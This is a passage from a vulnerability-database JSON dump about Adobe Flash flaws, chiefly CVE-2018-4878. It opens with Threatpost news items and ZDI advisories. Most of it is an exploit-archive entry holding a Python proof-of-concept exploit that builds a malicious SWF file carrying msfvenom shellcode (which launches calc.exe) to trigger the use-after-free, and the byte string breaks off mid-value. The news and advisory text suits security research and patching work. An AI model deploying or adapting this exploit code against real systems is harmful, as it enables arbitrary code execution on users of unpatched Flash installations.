Gorelik.\n\nAn Adobe spokesperson when asked to comment on the spam campaign said,\u201dthe majority of exploits are targeting software installations that are not up-to-date on the latest security updates. We always strongly recommend that users install security updates as soon as they are available.\u201d\n\nLooking forward, Gorelik said that he expects CVE-2018-4878 to cause more headaches in the years to come.\n\n\u201cAdobe released a patch early February, but it will take some companies weeks, months or even years to rollout the patch and cyber criminals keep developing new ways to exploit the vulnerability in this window,\u201d he said.\n", "modified": "2018-02-27T17:55:35", "published": "2018-02-27T17:55:35", "id": "THREATPOST:BC14FD8D22AC2C22C164C5B8B0E36C05", "href": "https://threatpost.com/massive-malspam-campaign-targets-unpatched-systems/130136/", "type": "threatpost", "title": "Massive Spam Campaign Targets Unpatched Systems", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-11-03T07:11:30", "bulletinFamily": "info", "cvelist": ["CVE-2018-15982", "CVE-2018-15983", "CVE-2018-4878"], "description": "Adobe on Wednesday released several unscheduled fixes for Flash Player, including a critical vulnerability that it said is being exploited in the wild.\n\nThe critical vulnerability, [CVE-2018-15982](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-15982>), is a use-after-free flaw enabling arbitrary code-execution in Flash.\n\n\u201cAdobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS,\u201d Adobe said in its release. \u201cThese updates address one critical vulnerability in Adobe Flash Player and one important vulnerability in Adobe Flash Player installer. Successful exploitation could lead to arbitrary code-execution and privilege-escalation in the context of the current user respectively.\u201d\n\nThe flaw was discovered by Chenming Xu and Ed Miles of Gigamon ATR. Researchers on Wednesday also outlined the further technical details about the [exploit of the vulnerability](<https://threatpost.com/adobe-flash-zero-day-leveraged-via-office-docs-in-campaign/139635/>).\n\nImpacted is Adobe Flash Player Desktop Runtime, Adobe Flash Player for [Google Chrome](<https://threatpost.com/google-chrome-71-touts-43-fixes-fights-ad-abuse/139623/>); Adobe Flash Player for Microsoft Edge and Internet Explorer 11; all for versions 31.0.0.153 and earlier. Adobe Flash Player Installer versions 31.0.0.108 and earlier is also affected.\n\nUsers of these impacted products can update to version 32.0.0.101, according to Adobe. Users of Adobe Flash Player Installer can update to version 31.0.0.122.\n\nAdobe also patched an important-rated insecure library loading (via DLL hijacking) vulnerability, CVE-2018-15983, that could lead to privilege escalation via Adobe Flash.\n\nThis is only the latest exploit to hit Adobe Flash \u2013 earlier in June, a zero-day Flash [vulnerability](<https://threatpost.com/zero-day-flash-exploit-targeting-middle-east/132659/>) was is being exploited in the wild in targeted attacks against Windows users in the Middle East, according to researchers. Adobe dealt with another zero-day Flash vulnerability back in February, which was [exploited ](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/north-korean-hackers-allegedly-exploit-adobe-flash-player-vulnerability-cve-2018-4878-against-south-korean-targets>)by North Korean hackers.\n", "modified": "2018-12-05T15:18:09", "published": "2018-12-05T15:18:09", "id": "THREATPOST:EA5D6454E04EAFE2D10FDC5BD6D23F81", "href": "https://threatpost.com/adobe-patches-zero-day-vulnerability-in-flash-player/139629/", "type": "threatpost", "title": "Adobe Patches Zero-Day Vulnerability in Flash Player", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2020-06-22T11:41:47", "bulletinFamily": "info", "cvelist": ["CVE-2018-4877"], "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of QOSProvider objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-02-23T00:00:00", "id": "ZDI-18-178", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-178/", "title": "Adobe Flash Player QOSProvider attachMediaPlayerItemLoader Use-After-Free Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:41:31", "bulletinFamily": "info", "cvelist": ["CVE-2018-4871"], "edition": 2, "description": "This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Adobe Flash. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of ATF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process.", "modified": "2018-06-22T00:00:00", "published": "2018-01-18T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-124/", "id": "ZDI-18-124", "type": "zdi", "title": "Adobe Flash ATF Parsing Out-Of-Bounds Read Information Disclosure Vulnerability", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:01", "description": "\nAdobe Flash 28.0.0.161 - Use-After-Free", "edition": 1, "published": "2018-04-06T00:00:00", "title": "Adobe Flash 28.0.0.161 - Use-After-Free", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4878"], "modified": "2018-04-06T00:00:00", "id": "EXPLOITPACK:3AE76F8EB91746556D3EB11E9FF64F66", "href": "", "sourceData": "#!/usr/bin/env python\n# coding: UTF-8\nimport BaseHTTPServer\nimport sys\nfrom SimpleHTTPServer import SimpleHTTPRequestHandler\n\nprint \"@Syfi2k\"\nprint \"[+] CVE-2018-4878 poc \"\nprint \"--------------------------------\"\nprint \"Calc.exe Shellcode via Msfvenom\"\nprint \"Based on fixed version https://github.com/anbai-inc/CVE-2018-4878\"\nprint \"No Crash without executing the Shellcode, Sandbox? try it yourself\"\n\n\nbuf = \"\"\nbuf += \"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\"\nbuf += \"\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\"\nbuf += \"\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\"\nbuf += \"\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\"\nbuf += \"\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\"\nbuf += \"\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\"\nbuf += \"\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\"\nbuf += \"\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\"\nbuf += \"\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\"\nbuf += \"\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\"\nbuf += \"\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x6a\\x01\\x8d\\x85\\xb2\\x00\"\nbuf += \"\\x00\\x00\\x50\\x68\\x31\\x8b\\x6f\\x87\\xff\\xd5\\xbb\\xf0\\xb5\"\nbuf += \"\\xa2\\x56\\x68\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\\x0a\"\nbuf += \"\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x53\"\nbuf += \"\\xff\\xd5\\x63\\x61\\x6c\\x63\\x2e\\x65\\x78\\x65\\x00\"\n \npayload = buf\ndata = \"\"\nflash_name = \"movie\"\n \n\n\ndata = \"\\x46\\x57\\x53\\x20\\xE3\\x45\\x00\\x00\\x78\\x00\\x04\\xE2\\x00\\x00\\x0E\\xA6\\x00\\x00\\x18\\x01\\x00\\x44\\x11\\x19\\x00\\x00\\x00\\x7F\\x13\\x1F\\x02\\x00\\x00\\x3C\\x72\\x64\\x66\\x3A\\x52\\x44\\x46\\x20\\x78\\x6D\\x6C\\x6E\\x73\\x3A\\x72\\x64\\x66\\x3D\\x22\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x77\\x33\\x2E\\x6F\\x72\\x67\\x2F\\x31\\x39\\x39\\x39\\x2F\\x30\\x32\\x2F\\x32\\x32\\x2D\\x72\\x64\\x66\\x2D\\x73\\x79\\x6E\\x74\\x61\\x78\\x2D\\x6E\\x73\\x23\\x22\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x3C\\x72\\x64\\x66\\x3A\\x44\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x20\\x78\\x6D\\x6C\\x6E\\x73\\x3A\\x64\\x63\\x3D\\x22\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x70\\x75\\x72\\x6C\\x2E\\x6F\\x72\\x67\\x2F\\x64\\x63\\x2F\\x65\\x6C\\x65\\x6D\\x65\\x6E\\x74\\x73\\x2F\\x31\\x2E\\x31\\x22\\x20\\x72\\x64\\x66\\x3A\\x61\\x62\\x6F\\x75\\x74\\x3D\\x22\\x22\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x66\\x6F\\x72\\x6D\\x61\\x74\\x3E\\x61\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x2F\\x78\\x2D\\x73\\x68\\x6F\\x63\\x6B\\x77\\x61\\x76\\x65\\x2D\\x66\\x6C\\x61\\x73\\x68\\x3C\\x2F\\x64\\x63\\x3A\\x66\\x6F\\x72\\x6D\\x61\\x74\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x74\\x69\\x74\\x6C\\x65\\x3E\\x41\\x64\\x6F\\x62\\x65\\x20\\x46\\x6C\\x65\\x78\\x20\\x34\\x20\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x3C\\x2F\\x64\\x63\\x3A\\x74\\x69\\x74\\x6C\\x65\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x64\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x3E\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x61\\x64\\x6F\\x62\\x65\\x2E\\x63\\x6F\\x6D\\x2F\\x70\\x72\\x6F\\x64\\x75\\x63\\x74\\x73\\x2F\\x66\\x6C\\x65\\x78\\x3C\\x2F\\x64\\x63\\x3A\\x64\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x70\\x75\\x62\\x6C\\x69\\x73\\x68\\x65\\x72\\x3E\\x75\\x6E\\x6B\\x6E\\x6F\\x77\\x6E\\x3C\\x2F\\x64\\x63\\x3A\\x70\\x75\\x62\\x6C\\x69\\x73\\x68\\x65\\x72\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x63\\x72\\x65\\x61\\x74\\x6F\\x72\\x3E\\x75\\x6E\\x6B\\x6E\\x6F\\x77\\x6E\\x3C\\x2F\\x64\\x63\\x3A\\x63\\x72\\x65\\x61\\x74\\x6F\\x72\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x6C\\x61\\x6E\\x67\\x75\\x61\\x67\\x65\\x3E\\x45\\x4E\\x3C\\x2F\\x64\\x63\\x3A\\x6C\\x61\\x6E\\x67\\x75\\x61\\x67\\x65\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x64\\x61\\x74\\x65\\x3E\\x46\\x65\\x62\\x20\\x36\\x2C\\x20\\x32\\x30\\x31\\x38\\x3C\\x2F\\x64\\x63\\x3A\\x64\\x61\\x74\\x65\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x3C\\x2F\\x72\\x64\\x66\\x3A\\x44\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x3E\\x20\\x3C\\x2F\\x72\\x64\\x66\\x3A\\x52\\x44\\x46\\x3E\\x0D\\x0A\\x00\\xD0\\x0F\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x44\\x10\\xE8\\x03\\x3C\\x00\\x43\\x02\\xFF\\xFF\\xFF\\xC8\\x0A\\x66\\x6C\\x61\\x73\\x68\\x30\\x32\\x00\\xFF\\x15\\x82\\x0B\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\"\n \n\nfiller = 2940 - len(payload)\n \ndata = data + payload + \"\\x90\" * filler\n\n\ndata = data + \"\\x13\\x0E\\x01\\x00\\x02\\x00\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x42\\x79\\x74\\x65\\x73\\x00\\x00\\xBF\\x14\\xB6\\x06\\x00\\x00\\x01\\x00\\x00\\x00\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x00\\x10\\x00\\x2E\\x00\\x02\\x00\\x28\\x8E\\xCD\\xBD\\x06\\xAD\\xCA\\x75\\x8F\\xCD\\xBD\\x06\\xAE\\xE4\\xE0\\x03\\x8E\\xCD\\xBD\\x06\\xFC\\xE2\\x75\\x8E\\xCD\\xBD\\x06\\xFE\\xF0\\x75\\x8E\\xCD\\xBD\\x06\\xF8\\xF8\\x75\\x8F\\xCD\\xBD\\x06\\xF9\\xFE\\xA1\\x03\\x8E\\xCD\\xBD\\x06\\xF8\\xDE\\x75\\x89\\xCD\\xBD\\x06\\xDC\\xB6\\xCD\\x02\\xD6\\xF6\\x68\\x8F\\xCD\\xBD\\x06\\xFA\\xE6\\xCD\\x03\\x8F\\xCD\\xBD\\x06\\xF5\\xDC\\xA1\\x03\\x8E\\xCD\\xBD\\x06\\xF1\\xDC\\x74\\x8F\\xCD\\xBD\\x06\\xD1\\xBA\\xFD\\x02\\x8F\\xCD\\xBD\\x06\\xEC\\xDC\\xCD\\x03\\x8E\\xCD\\xBD\\x06\\xEF\\xE4\\x75\\x8E\\xCD\\xBD\\x06\\xEE\\xF8\\x75\\x8E\\xCD\\xBD\\x06\\xE9\\xF0\\x75\\x89\\xCD\\xBD\\x06\\xEE\\xE6\\xDD\\x03\\xFF\\xD0\\x69\\x8F\\xCD\\xBD\\x06\\xCB\\xAA\\xC9\\x02\\x93\\xCD\\xBD\\x06\\x00\\x55\\x07\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x05\\x76\\x61\\x72\\x5F\\x31\\x00\\x0E\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x76\\x61\\x72\\x5F\\x32\\x0E\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x06\\x64\\x61\\x74\\x61\\x31\\x34\\x06\\x64\\x61\\x74\\x61\\x31\\x35\\x3C\\x43\\x3A\\x5C\\x55\\x73\\x65\\x72\\x73\\x5C\\x4D\\x69\\x68\\x61\\x5C\\x41\\x64\\x6F\\x62\\x65\\x4D\\x69\\x6E\\x65\\x50\\x6F\\x43\\x5F\\x74\\x72\\x79\\x69\\x6E\\x67\\x54\\x6F\\x45\\x76\\x61\\x64\\x65\\x53\\x65\\x63\\x53\\x6F\\x6C\\x75\\x74\\x69\\x6F\\x6E\\x73\\x66\\x6C\\x61\\x30\\x31\\x2E\\x61\\x73\\x05\\x64\\x61\\x74\\x61\\x32\\x05\\x64\\x61\\x74\\x61\\x33\\x09\\x42\\x79\\x74\\x65\\x41\\x72\\x72\\x61\\x79\\x0B\\x66\\x6C\\x61\\x73\\x68\\x2E\\x75\\x74\\x69\\x6C\\x73\\x06\\x45\\x6E\\x64\\x69\\x61\\x6E\\x0D\\x4C\\x49\\x54\\x54\\x4C\\x45\\x5F\\x45\\x4E\\x44\\x49\\x41\\x4E\\x06\\x65\\x6E\\x64\\x69\\x61\\x6E\\x0C\\x43\\x61\\x70\\x61\\x62\\x69\\x6C\\x69\\x74\\x69\\x65\\x73\\x0C\\x66\\x6C\\x61\\x73\\x68\\x2E\\x73\\x79\\x73\\x74\\x65\\x6D\\x07\\x76\\x65\\x72\\x73\\x69\\x6F\\x6E\\x01\\x2C\\x01\\x20\\x07\\x72\\x65\\x70\\x6C\\x61\\x63\\x65\\x21\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x61\\x64\\x6F\\x62\\x65\\x2E\\x63\\x6F\\x6D\\x2F\\x41\\x53\\x33\\x2F\\x32\\x30\\x30\\x36\\x2F\\x62\\x75\\x69\\x6C\\x74\\x69\\x6E\\x05\\x73\\x70\\x6C\\x69\\x74\\x05\\x41\\x72\\x72\\x61\\x79\\x0C\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x2E\\x61\\x73\\x24\\x30\\x14\\x66\\x6C\\x61\\x73\\x68\\x2E\\x64\\x69\\x73\\x70\\x6C\\x61\\x79\\x3A\\x53\\x70\\x72\\x69\\x74\\x65\\x24\\x66\\x6C\\x61\\x73\\x68\\x2E\\x64\\x69\\x73\\x70\\x6C\\x61\\x79\\x3A\\x44\\x69\\x73\\x70\\x6C\\x61\\x79\\x4F\\x62\\x6A\\x65\\x63\\x74\\x43\\x6F\\x6E\\x74\\x61\\x69\\x6E\\x65\\x72\\x1F\\x66\\x6C\\x61\\x73\\x68\\x2E\\x64\\x69\\x73\\x70\\x6C\\x61\\x79\\x3A\\x49\\x6E\\x74\\x65\\x72\\x61\\x63\\x74\\x69\\x76\\x65\\x4F\\x62\\x6A\\x65\\x63\\x74\\x1B\\x66\\x6C\\x61\\x73\\x68\\x2E\\x64\\x69\\x73\\x70\\x6C\\x61\\x79\\x3A\\x44\\x69\\x73\\x70\\x6C\\x61\\x79\\x4F\\x62\\x6A\\x65\\x63\\x74\\x1C\\x66\\x6C\\x61\\x73\\x68\\x2E\\x65\\x76\\x65\\x6E\\x74\\x73\\x3A\\x45\\x76\\x65\\x6E\\x74\\x44\\x69\\x73\\x70\\x61\\x74\\x63\\x68\\x65\\x72\\x00\\x06\\x4E\\x75\\x6D\\x62\\x65\\x72\\x07\\x63\\x6C\\x61\\x73\\x73\\x5F\\x31\\x05\\x76\\x61\\x72\\x5F\\x33\\x0F\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x2F\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x0A\\x69\\x73\\x44\\x65\\x62\\x75\\x67\\x67\\x65\\x72\\x05\\x76\\x61\\x72\\x5F\\x34\\x07\\x66\\x6C\\x61\\x73\\x68\\x31\\x30\\x05\\x76\\x61\\x72\\x5F\\x35\\x0F\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x2F\\x66\\x6C\\x61\\x73\\x68\\x32\\x31\\x04\\x76\\x6F\\x69\\x64\\x05\\x43\\x6C\\x61\\x73\\x73\\x17\\x5F\\x5F\\x67\\x6F\\x5F\\x74\\x6F\\x5F\\x64\\x65\\x66\\x69\\x6E\\x69\\x74\\x69\\x6F\\x6E\\x5F\\x68\\x65\\x6C\\x70\\x03\\x70\\x6F\\x73\\x03\\x33\\x36\\x34\\x03\\x34\\x36\\x33\\x03\\x34\\x39\\x38\\x03\\x35\\x33\\x37\\x03\\x31\\x39\\x39\\x03\\x32\\x32\\x39\\x03\\x69\\x6E\\x74\\x03\\x32\\x36\\x30\\x07\\x66\\x6C\\x61\\x73\\x68\\x32\\x31\\x04\\x31\\x32\\x37\\x30\\x0D\\x66\\x6C\\x61\\x73\\x68\\x2E\\x64\\x69\\x73\\x70\\x6C\\x61\\x79\\x06\\x53\\x70\\x72\\x69\\x74\\x65\\x06\\x4F\\x62\\x6A\\x65\\x63\\x74\\x0F\\x45\\x76\\x65\\x6E\\x74\\x44\\x69\\x73\\x70\\x61\\x74\\x63\\x68\\x65\\x72\\x0C\\x66\\x6C\\x61\\x73\\x68\\x2E\\x65\\x76\\x65\\x6E\\x74\\x73\\x0D\\x44\\x69\\x73\\x70\\x6C\\x61\\x79\\x4F\\x62\\x6A\\x65\\x63\\x74\\x11\\x49\\x6E\\x74\\x65\\x72\\x61\\x63\\x74\\x69\\x76\\x65\\x4F\\x62\\x6A\\x65\\x63\\x74\\x16\\x44\\x69\\x73\\x70\\x6C\\x61\\x79\\x4F\\x62\\x6A\\x65\\x63\\x74\\x43\\x6F\\x6E\\x74\\x61\\x69\\x6E\\x65\\x72\\x1C\\x5F\\x5F\\x67\\x6F\\x5F\\x74\\x6F\\x5F\\x63\\x74\\x6F\\x72\\x5F\\x64\\x65\\x66\\x69\\x6E\\x69\\x74\\x69\\x6F\\x6E\\x5F\\x68\\x65\\x6C\\x70\\x03\\x35\\x37\\x38\\x03\\x31\\x35\\x37\\x05\\x41\\x72\\x72\\x61\\x79\\x0B\\x66\\x6C\\x61\\x73\\x68\\x2E\\x75\\x74\\x69\\x6C\\x73\\x09\\x42\\x79\\x74\\x65\\x41\\x72\\x72\\x61\\x79\\x21\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x61\\x64\\x6F\\x62\\x65\\x2E\\x63\\x6F\\x6D\\x2F\\x41\\x53\\x33\\x2F\\x32\\x30\\x30\\x36\\x2F\\x62\\x75\\x69\\x6C\\x74\\x69\\x6E\\x09\\x77\\x72\\x69\\x74\\x65\\x42\\x79\\x74\\x65\\x08\\x74\\x6F\\x53\\x74\\x72\\x69\\x6E\\x67\\x00\\x06\\x4F\\x62\\x6A\\x65\\x63\\x74\\x06\\x53\\x74\\x72\\x69\\x6E\\x67\\x03\\x69\\x6E\\x74\\x04\\x06\\x07\\x06\\x07\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x32\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x31\\x0D\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x42\\x79\\x74\\x65\\x73\\x08\\x3A\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x0C\\x55\\x41\\x46\\x47\\x65\\x6E\\x65\\x72\\x61\\x74\\x6F\\x72\\x0F\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x3A\\x66\\x6C\\x61\\x73\\x68\\x32\\x31\\x10\\x3A\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x2F\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x3E\\x05\\x01\\x16\\x03\\x16\\x0D\\x16\\x12\\x08\\x17\\x05\\x1A\\x17\\x03\\x18\\x01\\x1A\\x01\\x1A\\x1B\\x1A\\x1C\\x1A\\x1D\\x1A\\x1E\\x1A\\x1F\\x16\\x38\\x16\\x3C\\x17\\x4D\\x16\\x49\\x16\\x44\\x16\\x49\\x16\\x49\\x16\\x49\\x08\\x46\\x17\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x05\\x51\\x18\\x51\\x1A\\x51\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x06\\x0C\\x01\\x02\\x05\\x06\\x07\\x08\\x09\\x0A\\x0B\\x0C\\x0D\\x0E\\x01\\x02\\x03\\x11\\x12\\x13\\x0C\\x01\\x12\\x17\\x06\\x18\\x08\\x09\\x0A\\x0B\\x0C\\x0D\\x0E\\x0C\\x12\\x17\\x18\\x0A\\x0B\\x0C\\x0D\\x0E\\x35\\x36\\x37\\x06\\x48\\x07\\x02\\x02\\x07\\x02\\x04\\x07\\x02\\x05\\x07\\x02\\x06\\x07\\x02\\x07\\x07\\x03\\x0C\\x07\\x03\\x0E\\x07\\x02\\x0F\\x07\\x02\\x10\\x07\\x02\\x08\\x07\\x04\\x11\\x07\\x02\\x13\\x07\\x05\\x16\\x07\\x05\\x18\\x07\\x02\\x19\\x1B\\x01\\x07\\x02\\x21\\x07\\x02\\x22\\x07\\x01\\x23\\x07\\x02\\x25\\x07\\x01\\x26\\x07\\x02\\x27\\x07\\x01\\x28\\x07\\x02\\x2A\\x07\\x02\\x2B\\x07\\x02\\x34\\x07\\x02\\x36\\x07\\x02\\x01\\x07\\x0F\\x39\\x09\\x01\\x02\\x07\\x02\\x3A\\x07\\x10\\x3B\\x07\\x0F\\x3D\\x07\\x0F\\x3E\\x07\\x0F\\x3F\\x1B\\x03\\x07\\x12\\x43\\x07\\x13\\x45\\x07\\x12\\x47\\x07\\x12\\x48\\x07\\x12\\x4A\\x07\\x12\\x4B\\x07\\x12\\x4C\\x07\\x12\\x4F\\x07\\x12\\x4E\\x07\\x12\\x36\\x07\\x12\\x2A\\x07\\x12\\x07\\x07\\x12\\x02\\x07\\x12\\x27\\x07\\x13\\x0E\\x07\\x12\\x0F\\x07\\x12\\x10\\x07\\x12\\x08\\x07\\x12\\x05\\x07\\x12\\x13\\x07\\x17\\x16\\x07\\x17\\x18\\x1B\\x04\\x07\\x12\\x21\\x07\\x12\\x22\\x07\\x12\\x04\\x07\\x12\\x50\\x07\\x12\\x01\\x07\\x12\\x52\\x07\\x12\\x2B\\x07\\x35\\x23\\x07\\x35\\x28\\x07\\x35\\x26\\x09\\x10\\x05\\x09\\x0F\\x05\\x05\\x00\\x00\\x49\\x00\\x00\\x00\\x49\\x00\\x00\\x18\\x53\\x00\\x00\\x00\\x54\\x00\\x00\\x00\\x49\\x00\\x0A\\x2C\\x01\\x2D\\x2E\\x2C\\x01\\x2D\\x2F\\x2C\\x01\\x2D\\x30\\x2C\\x01\\x2D\\x31\\x2C\\x01\\x2D\\x32\\x2C\\x01\\x2D\\x33\\x2C\\x01\\x2D\\x35\\x2C\\x01\\x2D\\x37\\x40\\x01\\x2D\\x41\\x2C\\x01\\x2D\\x42\\x01\\x40\\x1D\\x09\\x36\\x00\\x03\\x02\\x43\\x00\\x00\\x41\\x00\\x2E\\x01\\x00\\x02\\x04\\x02\\x31\\x00\\x01\\x19\\x00\\x30\\x00\\x02\\x06\\x00\\x02\\x01\\x01\\x40\\x04\\x01\\x00\\x00\\x00\\x05\\x00\\x01\\x01\\x01\\x02\\x03\\xD0\\x30\\x47\\x00\\x00\\x01\\x02\\x01\\x01\\x08\\x23\\xD0\\x30\\x65\\x00\\x60\\x29\\x30\\x60\\x20\\x30\\x60\\x21\\x30\\x60\\x22\\x30\\x60\\x23\\x30\\x60\\x1D\\x30\\x60\\x1D\\x58\\x00\\x1D\\x1D\\x1D\\x1D\\x1D\\x1D\\x68\\x40\\x47\\x00\\x00\\x02\\x01\\x01\\x0A\\x0B\\x03\\xD0\\x30\\x47\\x00\\x00\\x03\\x03\\x01\\x0A\\x0B\\x23\\xD0\\x30\\xD0\\x49\\x00\\x5D\\x30\\x5D\\x31\\x4A\\x31\\x00\\x60\\x06\\x87\\x61\\x30\\x60\\x30\\x60\\x07\\x66\\x47\\x61\\x46\\xD0\\x5D\\x41\\xD0\\x4A\\x41\\x01\\x61\\x43\\x47\\x00\\x00\\x04\\x02\\x01\\x09\\x0A\\x09\\xD0\\x30\\x5E\\x31\\x60\\x3F\\x61\\x31\\x47\\x00\\x00\\xBF\\x14\\xD7\\x09\\x00\\x00\\x01\\x00\\x00\\x00\\x55\\x41\\x46\\x47\\x65\\x6E\\x65\\x72\\x61\\x74\\x6F\\x72\\x00\\x10\\x00\\x2E\\x00\\x03\\xFF\\xFF\\xFF\\xFF\\x0F\\xFF\\xFF\\xFF\\xFF\\x0F\\x00\\x02\\x00\\x00\\xE0\\xFF\\xFF\\xFF\\xEF\\x41\\x79\\x01\\x01\\x00\\x3B\\x43\\x3A\\x5C\\x55\\x73\\x65\\x72\\x73\\x5C\\x4D\\x69\\x68\\x61\\x5C\\x41\\x64\\x6F\\x62\\x65\\x4D\\x69\\x6E\\x65\\x50\\x6F\\x43\\x5F\\x74\\x72\\x79\\x69\\x6E\\x67\\x54\\x6F\\x45\\x76\\x61\\x64\\x65\\x53\\x65\\x63\\x53\\x6F\\x6C\\x75\\x74\\x69\\x6F\\x6E\\x73\\x66\\x6C\\x61\\x30\\x2E\\x61\\x73\\x08\\x66\\x6C\\x61\\x73\\x68\\x30\\x24\\x30\\x06\\x70\\x61\\x72\\x61\\x6D\\x31\\x05\\x76\\x61\\x72\\x5F\\x31\\x08\\x6D\\x65\\x74\\x68\\x6F\\x64\\x5F\\x32\\x0F\\x4C\\x6F\\x63\\x61\\x6C\\x43\\x6F\\x6E\\x6E\\x65\\x63\\x74\\x69\\x6F\\x6E\\x09\\x66\\x6C\\x61\\x73\\x68\\x2E\\x6E\\x65\\x74\\x00\\x07\\x63\\x6F\\x6E\\x6E\\x65\\x63\\x74\\x05\\x4